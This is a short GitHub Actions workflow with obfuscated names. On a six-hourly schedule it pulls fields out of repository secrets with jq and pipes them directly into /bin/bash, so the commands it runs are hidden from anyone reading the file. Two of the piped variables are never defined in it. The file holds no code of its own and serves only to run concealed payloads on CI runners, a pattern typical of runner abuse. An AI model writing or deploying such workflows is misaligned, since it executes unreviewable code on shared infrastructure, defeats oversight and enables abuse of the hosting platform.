name: liyongfei1820

on:
  workflow_dispatch:
  schedule:
    - cron: '43 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: liyongfei1820
        env:
          hgakq98: ${{ secrets.hgakq98 }}
        run: |
          echo $hgakq98 | jq -r .bfc287 | /bin/bash
          echo $qign8 | jq -r .cz0 | /bin/bash
          echo $rtruh1475 | jq -r .msx19 | /bin/bash

